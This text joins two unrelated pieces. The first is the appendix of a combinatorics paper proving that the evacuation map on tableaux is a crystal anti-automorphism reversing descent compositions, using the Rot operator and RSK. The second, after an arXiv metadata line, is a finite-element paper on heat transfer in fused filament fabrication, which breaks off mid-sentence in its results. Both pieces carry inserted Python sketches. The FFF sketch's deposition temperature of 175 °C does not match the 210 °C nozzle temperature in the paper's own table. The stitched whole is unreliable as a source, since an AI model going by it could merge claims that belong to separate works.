We give here a proof that the evacuation map EVAC defined in section 4 is an anti-automorphism of crystals. We also give a proof that it inverses descent compositions. Berenstein and Zelevinsky proved the former in [Berenstein and Zelevinsky, 1996], but their proof uses a lot of tools from crystal theory and representation theory. We believe our proof to be of interest, since it can be more accessible, and it also uses an anti-automorphism of crystals on words, \(Rot\), already studied in the literature: for \(w=w_{1}w_{2}\ldots w_{k}\in[n]^{\otimes k}\), \[Rot(w)=\mbox{compl}(w_{k}\ldots w_{2}w_{1})=\bar{w_{k}}\ldots\bar{w_{2}}\bar{w_{1}},\] where \(\bar{\ell}=compl(\ell)=n-\ell+1\). The operator \(Rot\) was studied by Poirier and Reutenauer in [Poirier and Reutenauer, 1995]. They showed that \(Rot(w)=w_{0}ww_{0}\), where \(w_{0}=k(k-1)\ldots 321\) is the longest permutation of the symmetric group \(\mbox{S}_{k}\), for \(k\) the length of \(w\): \(ww_{0}\) is the mirror image of \(w\), and multiplying on the left by \(w_{0}\) changes each letter \(i\) into \(k-i+1\).
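As a small illustration of the operator \(Rot\) just defined, here is a quick Python sketch (the helper names are ours and tied to no particular library) showing that \(Rot\) is an involution and reverses the descent composition of a word.

```python
def rot(word, n):
    """Rot on a word over {1,...,n}: reverse the word and complement each
    letter l -> n - l + 1 (Poirier-Reutenauer's w0 w w0)."""
    return [n - l + 1 for l in reversed(word)]

def word_descent_composition(word):
    """Lengths of the minimal parsing of a word into weakly increasing runs."""
    comp, run = [], 1
    for a, b in zip(word, word[1:]):
        if b >= a:
            run += 1
        else:
            comp.append(run)
            run = 1
    comp.append(run)
    return comp

w, n = [2, 1, 3, 3, 1, 2], 3
print(rot(rot(w, n), n) == w)                 # True: Rot is an involution
print(word_descent_composition(w))            # [1, 3, 2]
print(word_descent_composition(rot(w, n)))    # [2, 3, 1], the reversed composition
```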
If \(w\) is not a permutation, we can standardize \(w\) according to its weight \(\beta\) from left to right, and afterwards de-standardize it according to \(\overleftarrow{\beta}\), from right to left. We then get the same effect on \(w\) as \(Rot\). We then have that

**Proposition A.1 :** \(Rot\) is an anti-automorphism of crystals of words which inverses descent compositions.

Proof.: We have that \(Rot\) is an involution, so it is a bijection. We need to show that \(Rot(f_{i}(w))=e_{n-i}(Rot(w))\) for any word \(w\). By definition, \(Rot(w)=\bar{w}_{k}\bar{w}_{k-1}\ldots\bar{w}_{2}\bar{w}_{1}\) where \(\bar{w}_{i}=n-w_{i}+1\). Suppose entries \(i\) and \(i+1\) give a certain sequence of unpaired parentheses \()^{\phi_{i}}(^{\epsilon_{i}}\). Then \(Rot(w)\) has the sequence \()^{\epsilon_{i}}(^{\phi_{i}}\) for entries \(n-i\) and \(n-i+1\), where the entries \(n-i+1\) are obtained from the letters \(i\) in \(w\), and the letters \(n-i\), from the letters \(i+1\) in \(w\). The letter \(i\) affected by \(f_{i}\) in \(w\) corresponds then to the letter \(n-i+1\) affected by \(e_{n-i}\) in \(Rot(w)\). Then \(Rot(f_{i}(w))=e_{n-i}(Rot(w))\).

Now descent compositions have been described as the lengths of the minimal parsing of words \(w\) into weakly increasing factors. If a word \(w\) has minimal parsing into factors of lengths \(\alpha\), then reversing the order of the letters and complementing them sends each weakly increasing factor of \(w\) to a weakly increasing factor of \(Rot(w)\), read in reversed order, and the strict descents between consecutive factors are preserved. The minimal parsing of \(Rot(w)\) therefore has lengths \(\overleftarrow{\alpha}\), so \(Rot\) inverses descent compositions.

Let's denote by \(B_{\lambda}(w)\) the crystal (on words) which has source \(w\), of weight \(\lambda\). Then \(B_{\lambda}(w)\simeq B(\lambda)_{n}\) by proposition 1.6.

**Remark A.2 :** It is possible to show that crystal operators preserve descent compositions on words [Appleby and Whitehead, 2020], so the fact that \(Rot\) inverses descent compositions of words implies that the image of a connected component of the crystal of words \(B_{\lambda}(w)\), under the \(Rot\) map, is the (dual) isomorphic connected component of the crystal of words \(B_{\lambda}(w)^{\#}\), obtained by reversing the arrow directions, re-labelling arrows \(i\) by \(n-i+1\), and vertices \(v\) by \(Rot(v)\). In particular, if \(w\) is a Yamanouchi word (the source of a connected component \(B_{\lambda}(w)\)), then \(Rot(w)\) is an anti-Yamanouchi word, with \(f_{i}(Rot(w))=NULL\) for all \(i\), and is the sink of \(B_{\lambda}(w)^{\#}\). These two components are isomorphic to the same \(B(\lambda)\), so the sources and sinks of both will map respectively on \(1_{\lambda}\) and on the sink of \(B(\lambda)\), which will be EVAC(\(1_{\lambda}\)).

We can now use the correspondence given by Poirier and Reutenauer to see how this \(Rot\) map affects the \(RSK\) insertion. Since \(Rot(w)=w_{0}ww_{0}\), then \(RSK(Rot(w))=RSK(w_{0}ww_{0})\).

**Proposition A.3 ([Chmutov et al., 2022]) :** \(RSK(w_{0}ww_{0})=(\text{EVAC}(P(w)),\text{EVAC}(Q(w)))\).

We can finally show that EVAC is an anti-automorphism of crystals of tableaux, by using only the results above.

**Proposition A.4 :** EVAC is an anti-automorphism of crystals of tableaux, when considering vertices as pairs of tableaux \((P,Q)\) with \(Q\) standard obtained through \(RSK\).

Proof.: First off, let's note that EVAC(\(Q\)) is a standard tableau which indexes an isomorphic connected component of crystals of tableaux.
Then pairs \((P,\text{EVAC}(Q))\) are the vertices of this isomorphic connected component, for all \(P\) appearing in the first connected component. All tableaux \(P\) of shape \(\lambda\) appear in \(B(\lambda)_{n}\). Since the involution EVAC sends a tableau of shape \(\lambda\) onto another tableau of the same shape, then it is an auto(iso)morphism on \(B(\lambda)_{n}\). If \(w\) is Yamanouchi, it is sent onto \((1_{\lambda},Q(w))\) through \(RSK\), and \(Rot(w)\) is sent onto \((\text{EVAC}(1_{\lambda}),\text{EVAC}(Q(w)))\). EVAC(\(1_{\lambda}\)) is then the sink of \(B(\lambda)_{n}\), by the above remark. If \(v=f_{i_{1}}f_{i_{2}}\ldots f_{i_{\ell}}(w)\), for \(w\) the Yamanouchi word which is the source of the connected component of the crystal of words in which lies \(v\), then \[RSK(Rot(v)) =RSK(Rot(f_{i_{1}}f_{i_{2}}\ldots f_{i_{\ell}}(w)))\] \[=RSK(e_{n-i_{1}}e_{n-i_{2}}\ldots e_{n-i_{\ell}}(Rot(w))\] \[=(e_{n-i_{1}}e_{n-i_{2}}\ldots e_{n-i_{\ell}}(\text{EVAC}(1_{ \lambda})),\text{EVAC}(Q(w))),\] where the crystal operators are either those on words or on tableaux depending on the object they apply to. The fact that \(RSK\) commutes with crystal operators, going from second equality to the third, follows from proposition 5.1. We then have that \(\text{EVAC}(f_{i}(P))=e_{n-i}(\text{EVAC}(P))\), and that EVAC is a crystal anti-automorphism. **Proposition A.5 :** EVAC inverses descent compositions of tableaux: if \(DesComp(T)=\alpha=(\alpha_{1},\alpha_{2},\ldots,\alpha_{s})\), then \(DesComp(\text{EVAC}(T))=\overset{\leftarrow}{\alpha}=(\alpha_{s},\ldots, \alpha_{2},\alpha_{1})\). Proof.: We have seen in section 5 that a word \(w\) and its recording tableau \(Q(w)\) share the same descent composition, and that \(RSK(w^{-1})=(P(w^{-1}),Q(w^{-1}))=(Q(w),P(w))\). For a fixed tableau \(T\), if \(rw(T)=w\), then \(w^{-1}\) and \(P(w)=T\) share the same descent composition. We have also seen that \(RSK(Rot(w))=(\text{EVAC}(P(w)),\text{EVAC}(Q(w)))\), so \[RSK(Rot(w)^{-1}) =(\text{EVAC}(Q(w)),\text{EVAC}(P(w)))\] \[=RSK(Rot(w^{-1})).\] Then \(Rot(w^{-1})\) and \(\text{EVAC}(P(w))=\text{EVAC}(T)\) share the same descent composition. Finally, since \(Rot\) inverses descent compositions on words, then if the descent composition of \(w^{-1}\) and \(P(w)=T\) is \(\alpha\), then the descent composition of \(Rot(w^{-1})\) and \(\text{EVAC}(T)\) is \(\overset{\leftarrow}{\alpha}\). Figure 6: Bijection between connected components isomorphic to \(B(\mu)\) which are linked by the anti-automorphisms \(Rot\) and EVAC, and the isomorphism of crystals \(RSK\), with \(\text{EVAC}(Q(w))=Q(w^{\prime})\) and \(w^{\prime}=RSK^{-1}(1_{\mu},\text{EVAC}(Q(w)))\).
2305.03455
Efficient simulation of the heat transfer in fused filament fabrication
Heat transfer simulations of the fused filament fabrication process are an important tool to predict bonding, residual stresses and strength of 3D printed parts. But in order to capture the significant thermal gradients that occur in the FFF printing process, a fine mesh discretization and short time steps are required, leading to extensive computational efforts. In this work a simulation framework is presented which combines several efficiency measures with the objective of reducing the computational efforts required in simulating the FFF printing process without simplifying the deposition physics or reducing the overall accuracy. Thus, the material deposition has been modeled with a hybrid element activation approach and elements are adaptively coarsened through an error-based coarsening condition. Additionally, an appropriate coarsening technique is presented for geometries with air-filled infill patterns. The accuracy of the numerical framework is experimentally validated and the efficiency of the framework is validated numerically by comparing the performance of models with and without any efficiency measures. Finally, its effectiveness is shown by simulating the printing process of a larger geometry.
Nathalie Ramos, Christoph Mittermeier, Josef Kiendl
2023-05-05T11:58:57Z
http://arxiv.org/abs/2305.03455v1
# Efficient Simulation of the Heat Transfer in Fused Filament Fabrication ###### Abstract Heat transfer simulations of the fused filament fabrication process are an important tool to predict bonding, residual stresses and strength of 3D printed parts. But in order to capture the significant thermal gradients that occur in the FFF printing process, a fine mesh discretization and short time steps are required, leading to extensive computational efforts. In this work a simulation framework is presented which combines several efficiency measures with the objective of reducing the computational efforts required in simulating the FFF printing process without simplifying the deposition physics or reducing the overall accuracy. Thus, the material deposition has been modeled with a hybrid element activation approach and elements are adaptively coarsened through an error-based coarsening condition. Additionally, an appropriate coarsening technique is presented for geometries with air-filled infill patterns. The accuracy of the numerical framework is experimentally validated and the efficiency of the framework is validated numerically by comparing the performance of models with and without any efficiency measures. Finally, its effectiveness is shown by simulating the printing process of a larger geometry. **Keywords:** Fused filament fabrication, heat transfer, finite elements, adaptive coarsening, element activation ## 1 Introduction Fused filament fabrication (FFF) is one of the additive manufacturing (AM) or three-dimensional (3D) printing technologies in which hot polymer is extruded in a layer-by-layer fashion along a predetermined path to form a 3D object. FFF is the most commonly-used AM technique due to advantages such as the wide availability of low-price materials, its easy operability and low energy requirements [1],[2],[3]. Although FFF is moving from being primarily a prototyping tool into being a manufacturing tool, the mechanical anisotropy and low mechanical strength of FFF printed parts in comparison to parts produced with traditional polymer manufacturing methods hinder this evolution from happening [2],[4],[5]. One of the causes is the discontinuous nature of the FFF process: a molten fiber is extruded and deposited onto the previously deposited layer, forming bonds with adjacent fibers [6]. This bond interface between layers tends to be the weakest link in FFF printed parts and the strength in z-direction tends to be much lower than in other directions [2]. Additionally, the rapid heating and cooling which occurs during the deposition process leads to high thermal gradients which can result in residual stresses [7]. This can also impact mechanical strength. In both cases, understanding the heat transfer and its significant impact on the bonding and strength of 3D printed parts is crucial in advancing the applicability of FFF [5], [8]. There are several works which address the heat transfer during the FFF printing process, albeit experimentally [6], [9], [10], analytically [11] or numerically. Amico and Peterson used finite element (FE) analysis in COMSOL multiphysics to simulate the deposition of a wall of one road thick [12]. Simulation of nozzle movement and material deposition was achieved using COMSOL's 'deformed geometry' node. Xu et al. also simulated the heat transfer in the FFF printing of a thin wall by using a 3D FE model implemented in C++ originally developed to study heat exchange during metal selective laser melting [9]. 
However, the deposition of polymer fractions was performed by changing properties of the FE domain from air to polymer. Zhou et al. used the element birth and death feature in FE software Ansys to simulate the deposition process of a cuboid shaped thin walled structure [13]. Cattenone et al. also used sequential element activation for the simulation of a spring and bridge in Abaqus [14]. An extensive review of further appropriate finite element methods for such heat transfer simulations can be found in [15]. In order to accurately capture the significant thermal gradients in these simulations, a very fine mesh discretization and short time steps are required and in return significant computational effort is required and high physical memory demands must be met [14],[16]. Thus, simulations in many of the aforementioned numerical methods have been performed on a small scale. Several strategies have been proposed to achieve compationally efficient frameworks to simulate AM processes. Dimensional reduction has been used in case of simple geometries which allow for a 2D simplification of the 3D geometry [17]. Spatial reduction is another method to reduce the computational effort. A hybrid element activation strategy has been employed in various works as a global remeshing approach [16],[18],[19]. Instead of having all elements representing the final geometry present from the start of the analysis in an inactive state, the final geometry is discretized in a number of subsequent meshes each to which a new quiet layer has been added. Lastly, adaptive meshing is also often used in a bid to minimize the computational expense. Adaptive refinement is typically implemented to achieve a refined, localised mesh in the vicinity of the melt zone or heat affected zone of the heat source [20], [21]. Conversely, entire layers further removed from the heat source can also be adaptively coarsened by lumping them together whilst keeping a homogeneous fine mesh around the heat source. This method has its origins in the numerical simulation of welding and it is now often applied in the simulation of metal AM [16],[22]. These aforementioned techniques are mostly applied in simulations of metal printing where geometries generally tend to be larger and a loss of accuracy is often inevitable as a result. In this work a simulation framework combining various techniques is presented which contributes towards achieving a reduced computational effort in thermal simulations of the FFF printing process, without sacrificing their overall accuracy. An adaptive coarsening framework is developed in which elements are gradually coarsened over the height of a printed part when satisfying an error-based condition instead of coarsening at pre-defined moments which can lead to premature coarsening and an increased loss of accuracy. Additionally, remeshing is applied in the form of a hybrid element activation approach to further reduce the number of degrees of freedom present in the finite element meshes and an appropriate coarsening technique is presented for geometries with air-filled infill patterns. This entire framework is presented in detail together with the governing equations describing the transient heat transfer analysis. The accuracy of the numerical framework is experimentally validated and the efficiency of the framework is validated numerically by comparing the performance of models with and without any efficiency measures. Finally, the effectiveness of the simulation framework is tested on a larger geometry. 
## 2 Experimental Set-Up

In order to validate the numerical simulations presented in this work, thermal measurements were performed during the printing of a block geometry as shown in figure 1. All of the samples were printed with a Prusa i3 MK3 printer. The material used was polylactic acid (PLA) and its thermal properties as provided by the manufacturer Fillamentum are listed in table 1. The geometry was printed with the process parameters listed in table 2.

\begin{table} \begin{tabular}{l c c} \hline \hline **Property** & **PLA** & **Air** \\ \hline Density \(\rho\) [kg/m\({}^{3}\)] & 1240 & 1.41 \\ Specific heat capacity \(c_{p}\) [J/kg\(\cdot\)K] & 1800 & 716 \\ Conductivity \(K_{0}\) [W/m\(\cdot\)K] & 0.13 & 0.023 \\ \hline \hline \end{tabular} \end{table} Table 1: Thermal properties PLA and air

Figure 1: Experimental model and set-up

The experimental set-up is shown in figure 1. K-type thermocouples were used to measure the temperature during the printing of the block at three measuring locations. N1 was located at z=\(\frac{1}{10}\cdot\)h, N2 was located at z=\(\frac{2}{5}\cdot\)h and N3 was located at z=\(\frac{3}{5}\cdot\)h, where h is the height of the block. All three points were situated in the same vertical planes: x=\(\frac{4}{7}\cdot\)w and y=\(\frac{4}{7}\cdot\)l, where w and l are the width and length of the block respectively. The temperature was recorded with a Graphtec GL220 data logger with a sampling frequency of 10 Hz. The exact measuring procedure was as follows: the block was initially printed up to the layer where the measuring point was located. The print was then paused for ten seconds to insert the thermocouple at the correct measuring location. This was done by spanning the wire over a printed measuring device (figure 1) which controlled the height and depth at which the thermocouple was placed with respect to the block. After placing the thermocouple, printing was resumed and the recording was started. This process was repeated four times for each measuring location. Thus, a total of 12 samples were printed and subjected to temperature recordings.

## 3 Numerical methods

The heat transfer that occurs during the FFF printing process presented in section 2 was numerically simulated by performing a transient thermal analysis. In this section, the finite element model and the efficiency measures to reduce the computational efforts in simulating the transient thermal analysis of FFF are presented.

### Heat Transfer Analysis

Various modes of heat exchange occur during the thermally driven deposition process in FFF [5]. Since the focus in this work is on the heat transfer during the deposition process, all heat transfer mechanisms that occur within the nozzle before and during extrusion are beyond the scope of this work. Starting from the energy balance, the transient heat transfer can be described by the following partial differential equation (PDE) [23]: \[\rho c_{p}\frac{\partial T(\mathbf{x},t)}{\partial t}=\nabla\cdot(K_{0}\nabla T(\mathbf{x},t))+Q \tag{1}\] in which \(T\) [K] is the temperature, \(\rho\) [kg/m\({}^{3}\)] is the material density, \(c_{p}\) [J/kg K] is the specific heat capacity, \(K_{0}\) [W/m K] is the conductivity and \(Q\) [W/m\({}^{3}\)] is the heat source. The left hand side represents the change in the thermal energy storage whereas the first term on the right hand side represents the heat transfer by conduction.
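As a rough illustration of the structure of Eq. (1), the sketch below integrates a bare-bones one-dimensional version of the conduction equation with an explicit finite-difference scheme. It is only meant to convey the character of the transient problem; the model in this work uses 3D finite elements in Ansys rather than finite differences, and the grid size and step count below are arbitrary.

```python
import numpy as np

# Minimal 1D explicit sketch of rho*cp*dT/dt = d/dx(K0*dT/dx), no source term.
rho, cp, K0 = 1240.0, 1800.0, 0.13      # PLA properties from Table 1
dx = 0.2e-3                              # grid spacing on the order of a layer height [m]
alpha = K0 / (rho * cp)                  # thermal diffusivity [m^2/s]
dt = 0.25 * dx**2 / alpha                # satisfies the explicit stability limit

T = np.full(50, 25.0)                    # ambient initial condition [degC]
T[0] = 175.0                             # freshly deposited hot end, held fixed (Dirichlet)

for _ in range(200):
    # central-difference update of the interior nodes
    T[1:-1] += alpha * dt / dx**2 * (T[2:] - 2.0 * T[1:-1] + T[:-2])
    T[-1] = 60.0                         # bed held at T_b (Dirichlet)

print(T[:5])
```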
The heat flux vector can be identified as \[\mathbf{q}=-K_{0}\nabla T(\mathbf{x},t) \tag{2}\] Solving the initial value problem given by the PDE in eq. 1 requires specification of the initial conditions at every point in the considered domain and specification of the temperatures along the boundary (Dirichlet boundary conditions) or of their derivatives (Neumann boundary conditions). The heat flow due to convection is given by Newton's law of cooling, which states that the heat energy flowing out per unit time per unit surface is proportional to the difference between the surface temperature \(T_{s}\) [K] and the temperature outside the surface \(T_{\infty}\) [K]: \[-K_{0}\nabla T(\mathbf{x},t)\mathbf{\cdot n}=h(T_{s}-T_{\infty}) \tag{3}\] where \(\mathbf{n}\) is the outward-pointing unit normal vector and where \(h\) [W/m\({}^{2}\) K] is the convective heat transfer coefficient. Finally, the heat flux due to radiation is defined by the Stefan-Boltzmann law: \[-K_{0}\nabla T(\mathbf{x},t)\mathbf{\cdot n}=\varepsilon\sigma(T_{s}^{4}-T_{\infty}^{4}) \tag{4}\] where \(\varepsilon\) is the emissivity and \(\sigma\) is the Stefan-Boltzmann constant.

\begin{table} \begin{tabular}{l l l} \hline \hline **Process parameter** & **Symbol** & **Value** \\ \hline Printing speed & \(v_{p}\) & 30 mm/s \\ Layer height & \(dh\) & 0.2 mm \\ Filament width & \(wf\) & 0.5 mm \\ Nozzle temperature & \(T_{n}\) & 210 \({}^{\circ}\)C \\ Ambient temperature & \(T_{a}\) & 25 \({}^{\circ}\)C \\ Bed temperature & \(T_{b}\) & 60 \({}^{\circ}\)C \\ Heat transfer coefficient & \(h\) & 25 W/m\({}^{2}\) K \\ \hline \hline \end{tabular} \end{table} Table 2: Process parameters FFF

### Modeling the Material Deposition

The continuous material deposition on the build stage or on previously deposited layers was simulated by using sequential element activation. In such an analysis, all finite elements representing the fully printed geometry are discretized in the finite element mesh and they are deactivated at the start of the analysis. The deposition process is then simulated by sequentially activating elements in the subsequent time steps along the path of the printing nozzle until the full geometry is activated. An element is initially deactivated by reducing the conductivity and specific heat capacity to near-zero values. Thus, the elements are still present in the FE mesh and the attached degrees of freedom (dofs) are present in the global system of equations, but they don't influence the solution. Conversely, the material properties are restored to their original values upon element activation. The numerical stability and accuracy of such an analysis will depend on the time step size. The time step size was determined by calculating the time required to activate or deposit a single element: \[\Delta t=\frac{dl}{v_{p}} \tag{5}\] where \(dl\) is the dimension of the element in the traveling direction of the nozzle, and \(v_{p}\) is the printing speed. The objective of this work was not to determine an optimal time step size, as there are other works which have dedicated significant efforts to this topic [14]. The \(\Delta t\) used in the current paper was significantly smaller than what is necessary to capture the cooling rate of PLA, so it was assumed to be small enough.

### Loads and Boundary Conditions

Upon element activation, the material deposition was simulated by prescribing the extrusion temperature directly at the nodes of the activated elements; i.e. the load was applied as a Dirichlet boundary condition.
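The element-activation bookkeeping described above can be sketched as follows. This is a schematic Python illustration with invented class and field names; the actual implementation relies on Ansys APDL property switching rather than any such data structure.

```python
# Schematic sketch of quiet element activation (invented names, not the APDL code).
QUIET_FACTOR = 1e-6                    # near-zero scaling for inactive elements

def time_step(dl, v_p):
    """Eq. (5): time needed to deposit one element of length dl at speed v_p."""
    return dl / v_p

class Node:
    def __init__(self, T):
        self.T = T                     # nodal temperature [degC]

class Element:
    def __init__(self, k0, cp, nodes):
        self.k0_full, self.cp_full = k0, cp
        self.nodes = nodes
        self.active = False
        # deactivated: conductivity and heat capacity reduced to near zero
        self.k0, self.cp = k0 * QUIET_FACTOR, cp * QUIET_FACTOR

    def activate(self, T_deposit):
        """Restore material properties and prescribe the extrusion temperature
        at all element nodes (Dirichlet load upon activation)."""
        self.active = True
        self.k0, self.cp = self.k0_full, self.cp_full
        for node in self.nodes:
            node.T = T_deposit

elem = Element(k0=0.13, cp=1800.0, nodes=[Node(25.0) for _ in range(8)])
elem.activate(T_deposit=175.0)
dt = time_step(dl=0.5e-3, v_p=30e-3)   # 0.5 mm element at 30 mm/s -> ~0.017 s
print(elem.active, dt)
```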
The load was prescribed at all nodes of the activated element, as opposed to only on those nodes without a solved degree of freedom from the previous time step (figure 2). Even though prescribing the temperature at all nodes could result in convergence issues due to the overwriting of the existing solution at certain nodes, this wasn't encountered in any of the simulations presented in this work (section 4). Moreover, for 8-node thermal finite elements (as used in this work) partial loading would result in only one loaded node in the case of adjacent elements, which could lead to an underestimation of the introduced thermal energy. Thus, this option was not applied.

Figure 2: Left: full Dirichlet loading, right: partial Dirichlet loading. Red nodes are loaded upon activation, nodes with pre-existing nodal solution indicated in black

In most FFF printing applications the effects of radiation are negligible as the effect of convection is governing [11]. Thus, the Neumann boundary condition representing convective heat transfer can be expressed as follows: \[K_{0}\nabla T(\mathbf{x},t)\mathbf{\cdot}\mathbf{n}+h(T_{b}-T_{\infty})=0\quad\mathbf{x}\in\Gamma_{c} \tag{6}\] where \(\Gamma_{c}\) are the free surfaces of the activated elements. Distinction is made between the free surfaces located at the edges of the geometry \(\Gamma_{c;\;p}\) and the temporary free surfaces, which are surfaces adjacent to inactive elements \(\Gamma_{c;\;t}\) (figure 3). During the transient analysis, the latter were continuously updated and identified. The heated printing bed was modeled by prescribing a fixed temperature at the bottom face of the geometry \(\Gamma_{b}\): \[T(\mathbf{x},t)=T_{b}\quad\mathbf{x}\in\Gamma_{b} \tag{7}\]

Figure 3: Application of convective boundary conditions at element surfaces

### Efficiency Measures

#### 3.4.1 Remeshing

In order to avoid having all dofs present during all time steps required to solve the full geometry, Denlinger et al. proposed a hybrid element activation method [16]. Instead of solving the full mesh with many inactive layers in one simulation, often referred to as the quiet activation method, remeshing occurs a predefined number of times until the final geometry is fully solved. Both activation methods are shown schematically in figure 4. Within each remeshing step in the hybrid activation approach, a user-defined number of inactive or quiet layers \(\mathrm{nh}_{\mathrm{add}}\) are added to the mesh and then sequentially activated. The number of times remeshing must occur will depend on \(\mathrm{nh}_{\mathrm{add}}\). In order to ensure continuity of the solution between the meshes of two subsequent remeshing steps, the solution of the previous mesh must be mapped onto the newly discretized geometry prior to the continuation of the analysis. The nodes within the coinciding part of the geometry of two subsequent meshes will be assigned the solution or nodal temperature of the previous remeshing step as an initial condition. The nodes in the quiet layers will be assigned the ambient temperature \(T_{a}\). Therefore, the initial condition is expressed as: \[T(\mathbf{x},0)=T_{a}\quad\mathbf{x}\in\Omega_{q} \tag{8}\] where \(\Omega_{q}\) represents the quiet part of the discretized domain.
In the active part of the domain \(\Omega_{a}\), the initial condition can be expressed as: \[T^{i}(\mathbf{x},0)=T^{i-1}(\mathbf{x},t_{e})\quad\mathbf{x}\in\Omega_{a} \tag{9}\] The temperatures at \(t=0\) in the current remeshing step \(i\) are equal to those at the last time step \(t_{e}\) of the previous remeshing step \(i-1\).

Figure 4: Various element activation methods

#### Adaptive Coarsening

The coarsening strategy in this work consists of a gradual coarsening approach: the elements become increasingly larger as the distance to the printing nozzle increases. How the coarsening is done is determined by the coarsening pattern, and the moment at which coarsening occurs is determined by the coarsening condition, since the coarsening is done adaptively. The coarsening pattern is controlled by two parameters, namely the number of coarsening levels MLVL and the coarsening factor CF, which determines how many elements are merged from one coarsening level to another. Figure 5 shows an example of a 2D coarsened geometry with two levels of coarsening and varying values of CF. CF=2 was applied in all coarsened meshes in this work and thus two elements in x-, two elements in y- and two elements in z-direction were merged to form one coarse element in the subsequent coarsening level. Coarsening will inevitably lead to hanging nodes (figure 5) at the interface between fine and coarse layers and/or between coarse layers of different coarsening levels. These nodes are attached to the elements above the interface layer, but not to the mesh below the interface layer. A continuous solution across this interface during the analysis is ensured by defining kinematic constraints prior to solving the global system of equations. Figure 5 shows even meshes where the numbers of elements in all coarsening levels are divisible by \(\mathrm{CF}^{\mathrm{MLVL}}\). This is usually not the case for most meshes and it is accounted for by slightly changing the coarsening pattern in x- and y-direction such that the number of hanging nodes is minimized. The first level in which an uneven number of elements needs to be coarsened will contain one coarse element that merges an uneven number of elements. The maximum size of this element (length or width) is: \[l_{\mathrm{max}}\leq 1.5\cdot 2^{k}\cdot l \tag{10}\] where \(l_{\mathrm{max}}\) is the maximum length of an element and where \(k\) is the coarsening level in which the element is coarsened. All neighbouring elements follow CF=2. This can be seen in LVL 2 of figure 5(a) and LVL 1 of figure 5(b). If the condition isn't satisfied, the uneven element from the previous level is transferred to the next coarsening level without any merging with other elements (LVL 2 in figure 5(b)). This also means that there won't be any hanging nodes at the location of the deviating element in the interface layer.

Figure 5: Similarly sized geometries with gradual coarsening patterns (varying CF). Hanging nodes shown in red.

Coarsening occurs when the temperature difference at all nodes between the meshes of two subsequent remeshing steps is smaller than a user-defined threshold. The coarsening condition is checked for each node in the layer that is up for coarsening in the current mesh in remeshing step \(i\) and its potentially coarsened mesh. Comparison with the potential mesh will determine if coarsening is appropriate before actually doing so in remeshing step \(i+1\). The element configuration in the potential mesh is identical to that of the current mesh, except for the next layer that is up for coarsening (figure 7).
Coarse element dimensions are prematurely assigned to the elements in this layer. The coarsening condition can be expressed as follows: \[\left|\frac{T_{j}-\hat{T}_{j}}{T_{j}}\right|<\varepsilon \tag{11}\] where \(T_{j}\) is the temperature at node \(j\) in the current mesh and where \(\varepsilon\) is the user-defined coarsening threshold. \(\hat{T}_{j}\) is the temperature at the projected location of node \(j\) in the potential mesh. As this node is not present in the potential mesh, \(\hat{T}_{j}\) must be calculated by linearly interpolating the nodal temperatures of the eight corner nodes of the coarse element (figure 6(c)). \(\varepsilon\) can be defined to be as small as the user deems fit. The influence of \(\varepsilon\) will be investigated in section 4. If all nodes in the potentially coarsened layer satisfy the coarsening condition, coarsening of that layer is appropriate. The same process can be repeated for the other layers in the various coarsening levels. As soon as the coarsening condition isn't met, the nodal coordinates and temperatures from the last approved potential mesh in remeshing step \(i\) are saved for mapping in remeshing step \(i+1\). The thermal transient analysis in remeshing step \(i\) can then be concluded.

Figure 6: Coarsening patterns in meshes with uneven element configurations

Figure 7: Adaptive coarsening: comparison between current mesh and potential mesh

#### Homogenizing Infill Geometries

An example of a layer with a rectilinear infill pattern with air content is schematically shown in figure 8. When simulating the deposition of such a layer, air elements must be activated in addition to the PLA elements. Air elements adjacent to polymer elements are activated simultaneously within the same time step, since they don't contribute to the actual printing time. Coarsening of elements that meet the coarsening condition can be done in the same manner as described in section 3.4.2. The main difference is that elements that are to be merged can consist of only air, only polymer or a combination of both materials. It was found in [24] that when modeling geometries with complex, air-filled infill structures, accurate heat transfer can be simulated with simplified infill structures as long as the infill density is respected. Thus, instead of considering the exact material configuration of the merged elements, effective or homogenized material properties are assigned to coarsened elements, in which the influence of the infill density \(\alpha\) of the printed part is included (figure 8). The exact infill pattern is always respected in the fine layers by exactly following the deposition path of the printing nozzle during the element activation. There are various methods to calculate effective properties of heterogeneous materials and porous media [25]. In this work a simple approach is chosen to calculate effective values of the relevant thermal properties, i.e. the conductivity and the (volumetric) heat capacity: \[K_{0;\;eff}=(1-\alpha)\cdot K_{0;\;air}+\alpha\cdot K_{0;\;pol} \tag{12}\] \[C_{eff}=(1-\alpha)\cdot C_{air}+\alpha\cdot C_{pol} \tag{13}\] \[C_{air}=\rho_{air}\cdot c_{p;\;air} \tag{14}\] \[C_{pol}=\rho_{pol}\cdot c_{p;\;pol} \tag{15}\] \[\alpha=\frac{V_{pol}}{V_{air}+V_{pol}} \tag{16}\] where subscripts \({}_{air}\) and \({}_{pol}\) refer to air and polymer respectively, where \(C\) is the volumetric heat capacity [J/m\({}^{3}\) K] and where \(V\) is the volume of a material in the printed part.
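The homogenization in Eqs. (12) to (16) amounts to a simple rule of mixtures. A short Python sketch is given below; the default property values are taken from Table 1, and the function name is ours, introduced only for illustration.

```python
def effective_properties(alpha, k_pol=0.13, k_air=0.023,
                         rho_pol=1240.0, cp_pol=1800.0,
                         rho_air=1.41, cp_air=716.0):
    """Rule-of-mixtures homogenization of Eqs. (12)-(16) for a coarsened
    element with polymer volume fraction alpha (the infill density)."""
    k_eff = (1.0 - alpha) * k_air + alpha * k_pol      # Eq. (12)
    C_air = rho_air * cp_air                            # Eq. (14), volumetric heat capacity
    C_pol = rho_pol * cp_pol                            # Eq. (15)
    C_eff = (1.0 - alpha) * C_air + alpha * C_pol       # Eq. (13)
    return k_eff, C_eff

print(effective_properties(alpha=0.5))                  # 50 % infill density
```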
### Numerical set-up All simulations presented in this work were carried out in Ansys Mechanical APDL V19.2. All geometries were discretized with SOLID70, 3D 8-node thermal finite elements. The thermal properties that were assigned to the elements are listed in table 1. These properties were also used to calculate the homogenized material properties assigned to the coarsened elements in the infill geometries. The dimensions of the non-coarsened elements were determined by the geometry of the filaments of the printed geometries. The element width \(wf\) was chosen to be equal to the filament width, the element length \(dl\) was assumed to be equal to the element width and the element height \(dh\) was equal to the layer height. Figure 8: left: Layer with an infill pattern (polymer in red and air in blue), right: effective material properties in coarsened layers (indicated in green) ## 4 Results & Discussion ### Experimental results Figure 9 shows the results of the thermal measurements performed with the thermocouples during the printing of the block at the three measuring locations N1, N2, N3. For each measuring location, the measured average temperature as well as the temperature envelope are plotted as a function of time. The \(T(t)\) graphs don't start at \(t=0\) which would be the start of the printing process, but at the time at which the filament is deposited on top of the thermocouple. It can be seen that the measured deposition temperature, captured by the first peak in the \(T(t)\) 